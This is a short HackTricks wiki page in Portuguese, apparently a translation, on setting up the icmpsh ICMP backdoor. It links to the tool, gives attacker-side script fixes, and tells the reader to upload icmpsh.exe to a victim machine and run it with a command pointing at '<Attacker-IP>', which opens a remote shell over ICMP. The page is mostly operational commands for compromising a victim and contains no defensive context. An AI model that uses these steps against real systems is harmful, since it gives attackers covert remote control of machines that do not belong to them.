hacktricks/backdoors/icmpsh.md
2023-06-06 18:56:34 +00:00

2.2 KiB

Baixe o backdoor em: https://github.com/inquisb/icmpsh

Lado do cliente

Execute o script: run.sh

Se você receber algum erro, tente mudar as linhas:

IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')

Para:

echo Please insert the IP where you want to listen
read IP

Lado da Vítima

Faça o upload do arquivo icmpsh.exe para a vítima e execute-o:

icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥